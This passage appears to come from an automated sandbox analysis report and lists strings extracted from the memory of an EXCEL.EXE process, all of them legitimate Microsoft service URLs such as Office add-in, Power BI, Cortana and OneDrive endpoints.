    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
    Source: EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechb
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryM
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comUrlW
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comomM
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.coms
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netK6
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netM
    Source: EXCEL.EXE, 00000000.00000003.580863661.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639135024.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637217342.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497003045.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766786019.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620260825.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576113847.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301457811.0000000013434000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301379414.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505076437.0000000013430000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497369175.0000000013432000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579184069.0000000013430000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netW
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net_
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netz
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets.
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
